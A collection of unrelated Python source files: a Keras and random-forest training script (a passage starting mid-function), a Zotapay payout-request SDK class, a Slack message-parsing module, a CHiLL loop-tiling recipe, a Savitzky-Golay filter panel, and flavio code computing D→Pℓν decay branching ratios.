                              kernel_initializer = LecunNormal(),
                              ),]
        # Hidden layer!
        architecture += [Dense(neurons,
                               activation='selu',
                               kernel_initializer = LecunNormal(),
                               ),
                         ]
        # N=deep extra layers are added!
        # NOTE(review): `[Dense(...)] * deep` repeats the SAME layer object
        # `deep` times; Keras normally rejects reusing one layer instance at
        # several sequential positions — confirm this works as intended.
        if deep:
            architecture += [Dense(neurons,
                                   activation='selu',
                                   kernel_initializer = LecunNormal(),
                                   )] * deep
        # Last layer!
        architecture += [Dense(
            last_neur_shape,
            activation='softmax'),
        ]
        # Build the model!
        model = Sequential(architecture)
        # Use as multiclassification metric
        # the area under the roc curves!
        auc_metric = AUC(num_thresholds=200,
                         curve="ROC",
                         summation_method="interpolation",
                         name=None,
                         dtype=None,
                         thresholds=None,
                         multi_label=False,
                         label_weights=None,)
        # Compile the model and fit it!
        model.compile(
            optimizer=SGD(learning_rate=LR),
            loss='categorical_crossentropy',
            metrics=[auc_metric])
        # check in console that architecture was as required!
        print(model.summary())
        history = model.fit(data['train'][0], data['train'][1],
                            batch_size = batch, epochs = epochs,
                            verbose=verbose,
                            validation_data=(data['val'][0], data['val'][1]))
        #3) Evaluate the network
        history = history.history
        history['ypred'] = model.predict(data['val'][0])
        history['ytrue'] = data['val'][1]
        # Save VALIDATION predictions and correct values
        # (argmax decodes the one-hot rows back to class indices).
        local_dictionary = {
            'true': np.argmax(history['ytrue'],1),
            'predicted': np.argmax(history['ypred'],1),
        }
        with open(f'results/val-network-predictions.csv', 'a') as f:
            pd.DataFrame(local_dictionary).to_csv(
                f, mode='a', header=f.tell()==0, index=False)
        # Save TESTING predictions and correct values
        local_dictionary = {
            'predicted': np.argmax(model.predict(data['test'][0]),1),
            'true': np.argmax(data['test'][1],1),
        }
        with open(f'results/test-network-predictions.csv', 'a') as f:
            pd.DataFrame(local_dictionary).to_csv(
                f, mode='a', header=f.tell()==0, index=False)
        return history, 'network'
    elif case=='forest':
        # Build and fit!
        clf = RandomForestClassifier(n_estimators=200)
        clf.fit(
            data['train'][0],
            data['train'][1], )
        history = {}
        history['ypred'] = clf.predict(data['val'][0])
        history['ytrue'] = data['val'][1]
        # Save VALIDATION predictions and correct values
        local_dictionary = {
            'true': history['ytrue'],
            'predicted': history['ypred'],
        }
        with open(f'results/val-forest-predictions.csv', 'a') as f:
            pd.DataFrame(local_dictionary).to_csv(
                f, mode='a', header=f.tell()==0, index=False)
        # Save TESTING predictions and correct values
        local_dictionary = {
            'predicted': clf.predict(data['test'][0]),
            'true': data['test'][1],
        }
        with open(f'results/test-forest-predictions.csv', 'a') as f:
            pd.DataFrame(local_dictionary).to_csv(
                f, mode='a', header=f.tell()==0, index=False)
        return history, 'forest'
#----------------------------------e-n-d--o-f--f-u-n-c-t-i-o-n-s-------
# Command-line entry point: dispatch to 'network' or 'forest' training
# depending on sys.argv[11].
if __name__=='__main__':
    def neuron_definer(n: int, deep: int, features: int):
        """Solve for the per-layer neuron count from the desired
        data/degrees-of-freedom ratio.

        Solves L / params(x) - 1 - n = 0 for x, where L is the number of
        training labels in the pickled dataset and
        params(x) = x*(features+10) + (1+deep)*x**2 approximates the
        network's trainable-parameter count.
        """
        x = Symbol('x')
        with open('datasets/database.pkl','rb') as f:
            data = pickle.load(f)
        # L = number of training labels
        L = len(data['total-train'][1])
        del(data)
        return float(max(solve(L/(x*(features+10)+(1+deep)*(x**2))-1-n, x)))
    if True:  # placeholder guard (always on)
        if sys.argv[11]=='network':
            # argv[1:5] -> [ratio offset, epochs, batch, deep]; argv[5] -> lr
            params = []
            for x in sys.argv[1:5]:
                params += [int(x)]
            [NEU, EPO, BA, dp, LR] = [*params,float(sys.argv[5])]
            # Effective input-feature count derived from the remaining CLI
            # flags -- assumes argv[12]=base feature count, argv[8]=keep
            # fraction, argv[10]=boolean flag, argv[6]=extra features;
            # TODO confirm against the launcher script.
            features = (
                int(sys.argv[12]) * float(sys.argv[8]) *
                (1-1/4 * (1-int(sys.argv[10]))) +
                int(sys.argv[6]) )
            NEU = neuron_definer(NEU, dp, features)
            NEU = int(NEU)+1  # round up so at least the solved count is used
            backend_wrapper(
                lambda: simple_plotter(*pickle_bridge(
                    *main(
                        neurons=NEU, epochs=EPO,
                        batch=BA, verbose=1,
                        deep=dp, lr=LR,
                        case = sys.argv[11],
                        ))))
        elif sys.argv[11]=='forest':
            # Random forest needs no hyper-parameter solving
            params = []
            backend_wrapper(
                lambda: simple_plotter(*pickle_bridge(
                    *main(
                        case = sys.argv[11],
                        ))))
|
from zotapaysdk.mg_requests.objects import MGRequestParam
from zotapaysdk.mg_requests.mg_request import MGRequest
class MGPayoutRequest(MGRequest):
    """Zotapay payout request (merchant-to-customer transfer).

    Every payout field is wrapped in an :class:`MGRequestParam` carrying
    its wire parameter name, value, maximum size and required flag.
    Initial values come from ``kwargs`` keyed by each parameter's
    ``arg_name``; all ``set_*`` mutators return ``self`` for chaining.
    """
    # pylint: disable=missing-function-docstring

    def __init__(self, **kwargs):
        spec = self.PayoutRequestParameters

        def _param(parameter, max_size, required):
            # Wrap one payout field, seeding its value from kwargs
            # (None when the caller did not supply it).
            return MGRequestParam(parameter.request_param_name,
                                  kwargs.get(parameter.arg_name, None),
                                  max_size=max_size,
                                  required=required)

        self._merchant_order_id = _param(spec.MERCHANT_ORDER_ID, 128, True)
        self._merchant_order_desc = _param(spec.MERCHANT_ORDER_DESC, 128, True)
        self._order_amount = _param(spec.ORDER_AMOUNT, 12, True)
        self._order_currency = _param(spec.ORDER_CURRENCY, 3, True)
        self._customer_email = _param(spec.CUSTOMER_EMAIL, 50, False)
        self._customer_first_name = _param(spec.CUSTOMER_FIRST_NAME, 50, True)
        self._customer_last_name = _param(spec.CUSTOMER_LAST_NAME, 50, True)
        self._customer_phone = _param(spec.CUSTOMER_PHONE, 15, True)
        self._customer_ip = _param(spec.CUSTOMER_IP, 20, True)
        self._customer_bank_code = _param(spec.CUSTOMER_BANK_CODE, 8, False)
        self._customer_bank_account_number = _param(
            spec.CUSTOMER_BANK_ACCOUNT_NUMBER, 15, True)
        self._customer_bank_account_name = _param(
            spec.CUSTOMER_BANK_ACCOUNT_NAME, 128, True)
        self._customer_bank_branch = _param(spec.CUSTOMER_BANK_BRANCH, 128, False)
        self._customer_bank_address = _param(spec.CUSTOMER_BANK_ADDRESS, 128, False)
        self._customer_bank_zip_code = _param(spec.CUSTOMER_BANK_ZIP_CODE, 15, False)
        self._customer_bank_routing_number = _param(
            spec.CUSTOMER_BANK_ROUTING_NUMBER, 16, False)
        self._customer_bank_province = _param(spec.CUSTOMER_BANK_PROVINCE, 64, False)
        self._customer_bank_area = _param(spec.CUSTOMER_BANK_AREA, 64, False)
        self._callback_url = _param(spec.CALLBACK_URL, 128, False)
        self._custom_param = _param(spec.CUSTOM_PARAM, 128, False)
        self._redirect_url = _param(spec.REDIRECT_URL, 128, True)

    # --- fluent accessors -------------------------------------------------

    @property
    def merchant_order_id(self):
        return self._merchant_order_id.param_value

    def set_merchant_order_id(self, value):
        self._merchant_order_id.set_value(value)
        return self

    @property
    def merchant_order_desc(self):
        return self._merchant_order_desc.param_value

    def set_merchant_order_desc(self, value):
        self._merchant_order_desc.set_value(value)
        return self

    @property
    def order_amount(self):
        return self._order_amount.param_value

    def set_order_amount(self, value):
        self._order_amount.set_value(value)
        return self

    @property
    def order_currency(self):
        return self._order_currency.param_value

    def set_order_currency(self, value):
        self._order_currency.set_value(value)
        return self

    @property
    def customer_email(self):
        return self._customer_email.param_value

    def set_customer_email(self, value):
        self._customer_email.set_value(value)
        return self

    @property
    def customer_first_name(self):
        return self._customer_first_name.param_value

    def set_customer_first_name(self, value):
        self._customer_first_name.set_value(value)
        return self

    @property
    def customer_last_name(self):
        return self._customer_last_name.param_value

    def set_customer_last_name(self, value):
        self._customer_last_name.set_value(value)
        return self

    @property
    def customer_phone(self):
        return self._customer_phone.param_value

    def set_customer_phone(self, value):
        self._customer_phone.set_value(value)
        return self

    @property
    def customer_ip(self):
        return self._customer_ip.param_value

    def set_customer_ip(self, value):
        self._customer_ip.set_value(value)
        return self

    @property
    def customer_bank_code(self):
        return self._customer_bank_code.param_value

    def set_customer_bank_code(self, value):
        self._customer_bank_code.set_value(value)
        return self

    @property
    def customer_bank_account_number(self):
        return self._customer_bank_account_number.param_value

    def set_customer_bank_account_number(self, value):
        self._customer_bank_account_number.set_value(value)
        return self

    @property
    def customer_bank_account_name(self):
        return self._customer_bank_account_name.param_value

    def set_customer_bank_account_name(self, value):
        self._customer_bank_account_name.set_value(value)
        return self

    @property
    def customer_bank_branch(self):
        return self._customer_bank_branch.param_value

    def set_customer_bank_branch(self, value):
        self._customer_bank_branch.set_value(value)
        return self

    @property
    def customer_bank_address(self):
        return self._customer_bank_address.param_value

    def set_customer_bank_address(self, value):
        self._customer_bank_address.set_value(value)
        return self

    @property
    def customer_bank_zip_code(self):
        return self._customer_bank_zip_code.param_value

    def set_customer_bank_zip_code(self, value):
        self._customer_bank_zip_code.set_value(value)
        return self

    @property
    def customer_bank_routing_number(self):
        return self._customer_bank_routing_number.param_value

    def set_customer_bank_routing_number(self, value):
        self._customer_bank_routing_number.set_value(value)
        return self

    @property
    def customer_bank_province(self):
        return self._customer_bank_province.param_value

    def set_customer_bank_province(self, value):
        self._customer_bank_province.set_value(value)
        return self

    @property
    def customer_bank_area(self):
        return self._customer_bank_area.param_value

    def set_customer_bank_area(self, value):
        self._customer_bank_area.set_value(value)
        return self

    @property
    def callback_url(self):
        return self._callback_url.param_value

    def set_callback_url(self, value):
        self._callback_url.set_value(value)
        return self

    @property
    def custom_param(self):
        return self._custom_param.param_value

    def set_custom_param(self, value):
        self._custom_param.set_value(value)
        return self

    @property
    def redirect_url(self):
        # BUGFIX: previously this returned the MGRequestParam wrapper
        # itself (and the setter below overwrote the wrapper with a raw
        # value), unlike every other field on this class. Now consistent
        # with the sibling properties.
        return self._redirect_url.param_value

    def set_redirect_url(self, value):
        self._redirect_url.set_value(value)
        return self
|
import re
from omnibot.services import slack
from omnibot.services import stats
def extract_users(text, bot):
    """Find Slack user mentions in `text`; map raw token -> user name.

    Handles ``<@U024BE7LH>``, ``<@U024BE7LH|bob-marley>`` and
    ``<@W...|...>`` forms.  When the name is not embedded in the token
    it is resolved via the Slack API; unresolved users map to ``None``.
    """
    statsd = stats.get_statsd_client()
    with statsd.timer('parser.extract_users'):
        user_arr = {}
        # Raw strings: '\w' in a plain literal is an invalid escape
        # sequence (SyntaxWarning on modern Python).
        users = re.findall(r'<@[UW]\w+(?:\|[\w-]+)?>', text)
        for user in users:
            match = re.match(r'<@([UW]\w+)(\|[\w-]+)?>', user)
            user_name = None
            if match.group(2) is not None:
                # user name is embedded; strip the leading '|'
                user_name = match.group(2)[1:]
            else:
                user_id = match.group(1)
                user_data = slack.get_user(bot, user_id)
                if user_data:
                    user_name = user_data['name']
            user_arr[user] = user_name
        return user_arr
def replace_users(text, users):
    """Substitute each raw user token in `text` with ``@username``,
    skipping tokens whose name could not be resolved."""
    for token, name in users.items():
        if name is None:
            continue
        text = text.replace(token, '@{}'.format(name))
    return text
def extract_channels(text, bot):
    """Find channel references in `text`; map raw token -> channel name.

    Handles ``<#C024BE7LR>`` and ``<#C024BE7LR|general-room>`` forms.
    Bare IDs are resolved through the Slack API; tokens that cannot be
    resolved are omitted from the result.
    """
    statsd = stats.get_statsd_client()
    with statsd.timer('parser.extract_channels'):
        channel_arr = {}
        # Raw strings: '\w' in a plain literal is an invalid escape
        # sequence (SyntaxWarning on modern Python).
        channels = re.findall(r'<#C\w+(?:\|[\w-]+)?>', text)
        for channel in channels:
            match = re.match(r'<#(C\w+)(\|[\w-]+)?>', channel)
            channel_name = None
            if match.group(2) is not None:
                # channel name is embedded; strip the leading '|'
                channel_name = match.group(2)[1:]
            else:
                channel_id = match.group(1)
                channel_data = slack.get_channel(bot, channel_id)
                if not channel_data:
                    # unresolved channels are skipped entirely
                    continue
                channel_name = channel_data['name']
            channel_arr[channel] = channel_name
        return channel_arr
def replace_channels(text, channels):
    """Substitute each raw channel token in `text` with
    ``#channel-name``, skipping unresolved tokens."""
    for token, name in channels.items():
        if name is None:
            continue
        text = text.replace(token, '#{}'.format(name))
    return text
def extract_subteams(text, bot):
    """Placeholder for subteam mention parsing; always returns an empty
    mapping.

    Example token (not yet handled): ``<!subteam^S012345|happy-peeps>``.
    """
    statsd = stats.get_statsd_client()
    # TODO: actually parse subteam tokens.
    with statsd.timer('parser.extract_subteams'):
        subteam_arr = {}
        return subteam_arr
def extract_specials(text):
    """Find special mentions like ``<!here|@here>``; map the raw token
    to its ``@label`` form."""
    statsd = stats.get_statsd_client()
    with statsd.timer('parser.extract_specials'):
        # Raw strings: '\w' in a plain literal is an invalid escape
        # sequence (SyntaxWarning on modern Python).
        specials = re.findall(r'<!\w+(?:\|@[\w-]+)?>', text)
        special_arr = {}
        for special in specials:
            match = re.match(r'<!(\w+)(?:\|@[\w-]+)?>', special)
            special_label = None
            if match.group(1) is not None:
                special_label = '@{}'.format(match.group(1))
            special_arr[special] = special_label
        return special_arr
def replace_specials(text, specials):
    """Substitute each raw special-mention token with its ``@label``."""
    for token, label in specials.items():
        if label is None:
            continue
        text = text.replace(token, label)
    return text
def extract_emojis(text):
    """Find emoji tokens like ``:test_me:`` or ``:test-me:``; map the
    raw token to its bare name."""
    statsd = stats.get_statsd_client()
    with statsd.timer('parser.extract_emojis'):
        # Raw strings: '\+' / '\-' in plain literals are invalid escape
        # sequences (SyntaxWarning on modern Python).
        emojis = re.findall(r':[a-z0-9_\+\-]+:', text)
        emoji_arr = {}
        for emoji in emojis:
            match = re.match(r':([a-z0-9_\+\-]+):', emoji)
            emoji_name = None
            if match.group(1) is not None:
                emoji_name = match.group(1)
            emoji_arr[emoji] = emoji_name
        return emoji_arr
def extract_emails(text):
    """Find ``<mailto:...>`` tokens; map the raw token to the bare
    address.

    The greedy ``[^>]*`` capture also swallows any ``|label`` suffix,
    which is stripped with ``split('|')``.
    """
    statsd = stats.get_statsd_client()
    with statsd.timer('parser.extract_emails'):
        # Raw string: '\|' in a plain literal is an invalid escape
        # sequence (SyntaxWarning on modern Python).
        emails = re.findall(
            # [^>]* is non-greedy .*
            r'<mailto:([^>]*)(?:\|[^>]*)?>',
            text
        )
        email_arr = {}
        for email in emails:
            unparsed_email = '<mailto:{0}>'.format(email)
            email_label = email.split('|')[0]
            email_arr[unparsed_email] = email_label
        return email_arr
def replace_emails(text, emails):
    """Substitute each raw mailto token with its plain address."""
    for token, label in emails.items():
        if label is None:
            continue
        text = text.replace(token, label)
    return text
def extract_urls(text):
    """Find ``<http...>`` tokens; map the raw token to the display URL.

    Handles ``<http://test.com>`` and ``<http://test.com|test.com>``;
    the greedy ``[^>]*`` capture keeps any ``|label`` suffix, stripped
    with ``split('|')``.
    """
    statsd = stats.get_statsd_client()
    with statsd.timer('parser.extract_urls'):
        # Raw string: '\|' in a plain literal is an invalid escape
        # sequence (SyntaxWarning on modern Python).
        urls = re.findall(r'<(http[s]?://[^>]*)(?:\|[^>]*)?>', text)
        url_arr = {}
        for url in urls:
            unparsed_url = '<{0}>'.format(url)
            url_label = url.split('|')[0]
            url_arr[unparsed_url] = url_label
        return url_arr
def replace_urls(text, urls):
    """Substitute each raw URL token with its display label."""
    for token, label in urls.items():
        if label is None:
            continue
        text = text.replace(token, label)
    return text
def extract_mentions(text, bot, channel):
    """Return truthy when the message is directed at the bot: either a
    direct-message channel or a message whose first word is
    ``@botname``."""
    statsd = stats.get_statsd_client()
    with statsd.timer('parser.extract_mentions'):
        addressed = text.split(' ')[0] == '@{}'.format(bot.name)
        return channel.get('is_im') or addressed
def extract_command(text, bot):
    """Strip the bot mention from `text`, returning the bare command.

    If the text starts with ``@botname`` the prefix is removed;
    otherwise everything up to (and including) the LAST mention is
    dropped.  Text without a mention is returned unchanged.
    """
    statsd = stats.get_statsd_client()
    with statsd.timer('parser.extract_command'):
        at_me = '@{}'.format(bot.name)
        if text.startswith(at_me):
            return text[len(at_me):].strip()
        if at_me in text:
            # greedy '.*' removes through the last occurrence of the
            # mention (NOTE: assumes bot.name has no regex metachars)
            return re.sub(r'.*{}'.format(at_me), '', text).strip()
        return text
def unextract_specials(text):
    """Re-encode bare ``@here``/``@channel`` into Slack's ``<!...>``
    syntax."""
    statsd = stats.get_statsd_client()
    with statsd.timer('parser.unextract_specials'):
        for hit in re.findall('(@here|@channel)', text):
            text = text.replace(hit, '<!{0}|{0}>'.format(hit[1:]))
        return text
def unextract_channels(text, bot):
    """Re-encode ``#channel-name`` references into ``<#ID|name>``
    tokens, resolving names through the Slack API."""
    statsd = stats.get_statsd_client()
    with statsd.timer('parser.unextract_channels'):
        # Raw string: '\w' in a plain literal is an invalid escape
        # sequence (SyntaxWarning on modern Python).
        _channel_labels = re.findall(r'(^#[\w\-_]+| #[\w\-_]+)', text)
        for label in _channel_labels:
            # NOTE(review): the stripped label still includes the
            # leading '#' (unlike unextract_users, which passes the
            # '@name' label) -- assumed to be what
            # slack.get_channel_by_name expects; confirm.
            channel = slack.get_channel_by_name(bot, label.strip())
            if not channel:
                continue
            text = text.replace(
                '#{}'.format(channel['name']),
                '<#{0}|{1}>'.format(
                    channel['id'],
                    channel['name']
                )
            )
        return text
def unextract_users(text, bot):
    """Re-encode bare ``@username`` references into ``<@ID|name>``
    tokens, resolving names through the Slack API."""
    statsd = stats.get_statsd_client()
    with statsd.timer('parser.unextract_users'):
        # Raw string: '\w' in a plain literal is an invalid escape
        # sequence (SyntaxWarning on modern Python).
        _user_labels = re.findall(r'(^@[\w\-_]+| @[\w\-_]+)', text)
        user_labels = [label.strip() for label in _user_labels]
        for label in user_labels:
            user = slack.get_user_by_name(bot, label)
            if not user:
                continue
            text = text.replace(
                label,
                '<@{0}|{1}>'.format(
                    user['id'],
                    slack.get_name_from_user(user)
                )
            )
        return text
|
# CHiLL transformation recipe: tile the `mm` (matrix-multiply-style)
# kernel and insert a data copy for locality.
from chill import *
source('datacopy34.c')              # input C file containing `mm`
destination('datacopy4modified.c')  # where the transformed code is written
procedure('mm')                     # operate on procedure `mm`
loop(0)                             # select the first loop nest
original()
# tile(stmt, loop_level, tile_size) per CHiLL convention -- TODO confirm
tile(0,3,16)
# copy the arrays of statement 0 (dims [0,1]) at loop level 4 -- TODO confirm
datacopy([(0,[0,1])],4)
print_code()                        # emit the transformed code
|
# import the main panels structure, required
from ..panels import boxPanel
# import here your procedure-specific modules, no requirements (numpy as an example)
from scipy.signal import savgol_filter
# Set the details of the procedure; these constants are read by the UI.
NAME = 'SavGol'  # Name, please keep it short as it will appear in the combo box of the user interface
DESCRIPTION = 'Filter the curve with a Savitzky Golay filter; ideal to preserve steps'  # Free text
# set a DOI of a publication you want/suggest to be cited, empty if no reference
DOI = 'https://doi.org/10.1038/s41592-019-0686-2'
# Create your filter class by extending the main one
# Additional methods can be created, if required
class Filter(boxPanel):
    """Savitzky-Golay smoothing filter panel.

    Smooths the y channel with a least-squares polynomial window; good
    at preserving step-like features (see DOI above).
    """

    def create(self):
        # Describes the form created in the user interface; the last
        # argument is each field's initial value (types: int, float, combo).
        self.addParameter('win', 'float', 'Window size [nm]', 25)
        self.addParameter('order', 'int', 'Order of the interpolation', 3)

    def calculate(self, x, y, curve=None):
        """Return ``(x, smoothed_y)``, or ``False`` when the requested
        window is unusable for the given polynomial order."""
        win = self.getValue('win') * 1e-9  # UI window is given in nm
        xstep = (max(x) - min(x)) / (len(x) - 1)  # average x spacing
        win = int(win / xstep)  # window length in samples
        polyorder = self.getValue('order')
        if win % 2 == 0:
            win += 1  # savgol_filter requires an odd window length
        # BUGFIX: scipy requires polyorder < window_length; the original
        # `polyorder > win` check let the equal case through, raising
        # inside savgol_filter instead of failing gracefully.
        if polyorder >= win:
            return False
        y_smooth = savgol_filter(y, win, polyorder)
        return x, y_smooth
|
r"""Functions for exclusive $D\to P\ell\nu$ decays.
Copied from `flavio.physics.bdecays.bplnu`
"""
from math import sqrt
import flavio
from flavio.physics import ckm
from flavio.classes import AuxiliaryQuantity
from flavio.config import config
from flavio.physics.running import running
from flavio.physics.bdecays import angular
from flavio.physics.bdecays.wilsoncoefficients import get_wceff_fccc
from flavio.classes import Observable, Prediction
# (mother D meson, daughter pseudoscalar) -> quark-level transition
meson_quark = {
    ('D+', 'pi0'): 'cd',
    ('D0', 'pi+'): 'cd',
    ('D+', 'K0'): 'cs',
    ('D0', 'K+'): 'cs',
}
# (mother D meson, daughter pseudoscalar) -> form-factor label
meson_ff = {
    ('D+', 'pi0'): 'D->pi',
    ('D0', 'pi+'): 'D->pi',
    ('D+', 'K0'): 'D->K',
    ('D0', 'K+'): 'D->K',
}
def prefactor(q2, par, D, P, lep):
    """Common normalisation ``4*GF/sqrt(2)*V_ij`` of the decay
    amplitude; zero below the lepton-mass threshold ``q2 <= m_l**2``."""
    GF = par['GF']
    ml = par['m_'+lep]
    transition = meson_quark[(D, P)]
    # pick the relevant CKM element: V_cd for c->d, V_cs for c->s
    row, col = {'cd': (1, 0), 'cs': (1, 1)}[transition]
    Vij = ckm.get_ckm(par)[row, col]
    if q2 <= ml**2:
        return 0
    return 4 * GF / sqrt(2) * Vij
def get_ff(q2, par, D, P):
    """Look up the D->P form factor via its AuxiliaryQuantity."""
    quantity = AuxiliaryQuantity[meson_ff[(D, P)] + ' form factor']
    return quantity.prediction(par_dict=par, wc_obj=None, q2=q2)
def get_angularcoeff(q2, wc_obj, par, D, P, lep):
    """Angular coefficients summed over all neutrino flavours (to
    include lepton-flavour-violating contributions)."""
    per_flavour = [_get_angularcoeff(q2, wc_obj, par, D, P, lep, nu)
                   for nu in ('e', 'mu', 'tau')]
    return {key: sum(coeffs[key] for coeffs in per_flavour)
            for key in ('a', 'b', 'c')}
def _get_angularcoeff(q2, wc_obj, par, D, P, lep, nu):
    """Angular coefficients for one (charged lepton, neutrino) flavour
    pair; LFV combinations with vanishing Wilson coefficients
    short-circuit to zero."""
    scale = config['renormalization scale']['dpll']
    mc = running.get_mc(par, scale)  # running charm mass at `scale`
    wc = get_wceff_fccc(wc_obj, par, meson_quark[(D, P)][::-1], lep, nu, None, scale, nf=4)
    if lep != nu and all(C == 0 for C in wc.values()):
        return {'a': 0, 'b': 0, 'c': 0}  # if all WCs vanish, so does the AC!
    ml = par['m_' + lep]
    mD = par['m_' + D]
    mP = par['m_' + P]
    N = prefactor(q2, par, D, P, lep)
    ff = get_ff(q2, par, D, P)
    qi_qj = meson_quark[(D, P)]
    # running mass of the daughter light quark (d or s)
    if qi_qj == 'cd':
        mlight = running.get_md(par, scale)
    if qi_qj == 'cs':
        mlight = running.get_ms(par, scale)
    h = angular.helicity_amps_p(q2, mD, mP, mc, mlight, ml, 0, ff, wc, N)
    J = angular.angularcoeffs_general_p(h, q2, mD, mP, mc, mlight, ml, 0)
    return J
def dGdq2(J):
    """Differential rate from the angular coefficients:
    dGamma/dq2 = 2*(J_a + J_c/3)."""
    a, c = J['a'], J['c']
    return 2 * (a + c / 3.)
def dBRdq2_lep(q2, wc_obj, par, D, P, lep):
    """Differential branching ratio dBR/dq2 for a single lepton
    flavour; zero outside the physical q2 range."""
    ml = par['m_' + lep]
    mD = par['m_' + D]
    mP = par['m_' + P]
    # physical range: m_l^2 <= q2 <= (m_D - m_P)^2
    if not ml**2 <= q2 <= (mD - mP)**2:
        return 0
    tauD = par['tau_' + D]
    J = get_angularcoeff(q2, wc_obj, par, D, P, lep)
    if P == 'pi0':
        # factor of 1/2 for neutral pi due to pi = (uubar-ddbar)/sqrt(2)
        return tauD * dGdq2(J) / 2.
    return tauD * dGdq2(J)
def dBRdq2(q2, wc_obj, par, D, P, lep):
    """dBR/dq2; the pseudo-flavour 'l' averages e and mu channels."""
    if lep != 'l':
        return dBRdq2_lep(q2, wc_obj, par, D, P, lep)
    channels = [dBRdq2_lep(q2, wc_obj, par, D, P, f) for f in ('e', 'mu')]
    return sum(channels) / 2
def dBRdq2_function(D, P, lep):
    """Factory: closure ``(wc_obj, par, q2) -> dBR/dq2`` for a fixed
    decay and lepton flavour."""
    def fct(wc_obj, par, q2):
        return dBRdq2(q2, wc_obj, par, D, P, lep)
    return fct
def BR_binned(q2min, q2max, wc_obj, par, D, P, lep):
    """Branching ratio integrated over the q2 bin [q2min, q2max]."""
    integrand = lambda q2: dBRdq2(q2, wc_obj, par, D, P, lep)
    return flavio.math.integrate.nintegrate(integrand, q2min, q2max)
def BR_binned_function(D, P, lep):
    """Factory: closure ``(wc_obj, par, q2min, q2max) -> binned BR``."""
    def fct(wc_obj, par, q2min, q2max):
        return BR_binned(q2min, q2max, wc_obj, par, D, P, lep)
    return fct
def BR_binned_leptonflavour(q2min, q2max, wc_obj, par, D, P, lnum, lden):
    """Ratio of binned BRs for two lepton flavours; returns 0 when the
    numerator vanishes (avoids a pointless denominator integral)."""
    numerator = BR_binned(q2min, q2max, wc_obj, par, D, P, lnum)
    if numerator == 0:
        return 0
    denominator = BR_binned(q2min, q2max, wc_obj, par, D, P, lden)
    return numerator / denominator
def BR_binned_leptonflavour_function(D, P, lnum, lden):
    """Factory: closure over a fixed decay and lepton-flavour pair."""
    def fct(wc_obj, par, q2min, q2max):
        return BR_binned_leptonflavour(q2min, q2max, wc_obj, par, D, P, lnum, lden)
    return fct
def _BR_tot(wc_obj, par, D, P, lep):
    """Total BR for one lepton flavour: integrate over the whole
    physical q2 range [m_l^2, (m_D - m_P)^2]."""
    q2min = par['m_'+lep]**2
    q2max = (par['m_'+D] - par['m_'+P])**2
    return BR_binned(q2min, q2max, wc_obj, par, D, P, lep)
def BR_tot(wc_obj, par, D, P, lep):
    """Total BR; the pseudo-flavour 'l' averages e and mu channels."""
    if lep != 'l':
        return _BR_tot(wc_obj, par, D, P, lep)
    e_br = _BR_tot(wc_obj, par, D, P, 'e')
    mu_br = _BR_tot(wc_obj, par, D, P, 'mu')
    return (e_br + mu_br) / 2.
def BR_tot_function(D, P, lep):
    """Factory: closure ``(wc_obj, par) -> total BR``."""
    def fct(wc_obj, par):
        return BR_tot(wc_obj, par, D, P, lep)
    return fct
def BR_binned_tot_function(D, P, lep):
    """Factory: closure returning the binned BR normalised to the total
    BR; 0 when the bin itself vanishes."""
    def f(wc_obj, par, q2min, q2max):
        partial = BR_binned(q2min, q2max, wc_obj, par, D, P, lep)
        if partial == 0:
            return 0
        return partial / BR_tot(wc_obj, par, D, P, lep)
    return f
def BR_tot_leptonflavour(wc_obj, par, D, P, lnum, lden):
    """Ratio of total BRs for two lepton flavours; 0 when the numerator
    vanishes (avoids computing the denominator)."""
    numerator = BR_tot(wc_obj, par, D, P, lnum)
    if numerator == 0:
        return 0
    return numerator / BR_tot(wc_obj, par, D, P, lden)
def BR_tot_leptonflavour_function(D, P, lnum, lden):
    """Factory: closure over a fixed decay and lepton-flavour pair."""
    def fct(wc_obj, par):
        return BR_tot_leptonflavour(wc_obj, par, D, P, lnum, lden)
    return fct
# Observable and Prediction instances
# Raw string for the mu entry: '\m' in a plain literal is an invalid
# escape sequence (SyntaxWarning on modern Python); the rendered text
# is byte-identical.
_tex = {'e': 'e', 'mu': r'\mu', 'l': r'\ell'}
# Observable prefix -> factory producing the prediction function
_func = {'dBR/dq2': dBRdq2_function, 'BR': BR_tot_function, '<BR>': BR_binned_function}
_desc = {'dBR/dq2': 'Differential', 'BR': 'Total', '<BR>': 'Binned'}
_tex_br = {'dBR/dq2': r'\frac{d\text{BR}}{dq^2}', 'BR': r'\text{BR}', '<BR>': r'\langle\text{BR}\rangle'}
# kinematic arguments each observable variant takes (None = no arguments)
_args = {'dBR/dq2': ['q2'], 'BR': None, '<BR>': ['q2min', 'q2max']}
# decay-channel metadata: LaTeX label plus mother/daughter particle names
_hadr = {
    'D+->K': {'tex': r"D^+\to K^0", 'D': 'D+', 'P': 'K0', },
    'D0->K': {'tex': r"D^0\to K^- ", 'D': 'D0', 'P': 'K+', },
    'D+->pi': {'tex': r"D^+\to \pi^0", 'D': 'D+', 'P': 'pi0', },
    'D0->pi': {'tex': r"D^0\to \pi^- ", 'D': 'D0', 'P': 'pi+', },
}
# for LF ratios we don't distinguish D+ and D0 (but take D0 because we have to choose sth)
_hadr_l = {
    'D->K': {'tex': r"D\to K", 'D': 'D0', 'P': 'K+', 'decays': ['D+->K', 'D0->K'],},
    'D->pi': {'tex': r"D\to \pi ", 'D': 'D0', 'P': 'pi+', 'decays': ['D+->pi', 'D0->pi'],},
}
_process_taxonomy = r'Process :: $c$ hadron decays :: Semi-leptonic tree-level decays :: $D\to P\ell\nu$ :: $'
# Register one Observable + Prediction per (lepton, channel, BR variant)
for l in ['e', 'mu', 'l']:
    for M in _hadr.keys():
        for br in ['dBR/dq2', 'BR', '<BR>']:
            _obs_name = br + "("+M+l+"nu)"
            _process_tex = _hadr[M]['tex']+_tex[l]+r"^+\nu_"+_tex[l]
            _obs = Observable(_obs_name)
            _obs.set_description(_desc[br] + r" branching ratio of $" + _process_tex + r"$")
            _obs.tex = r'$' + _tex_br[br] + r"(" + _process_tex + r")$"
            _obs.arguments = _args[br]
            _obs.add_taxonomy(_process_taxonomy + _process_tex + r"$")
            Prediction(_obs_name, _func[br](_hadr[M]['D'], _hadr[M]['P'], l))
# Lepton flavour ratios
for l in [('mu','e')]:
    for M in _hadr_l.keys():
        # binned ratio of BRs
        _obs_name = "<R"+l[0]+l[1]+">("+M+"lnu)"
        _obs = Observable(name=_obs_name, arguments=['q2min', 'q2max'])
        _obs.set_description(r"Ratio of partial branching ratios of $" + _hadr_l[M]['tex'] +_tex[l[0]]+r"^+ \nu_"+_tex[l[0]]+r"$" + " and " + r"$" + _hadr_l[M]['tex'] +_tex[l[1]]+r"^+ \nu_"+_tex[l[1]]+r"$")
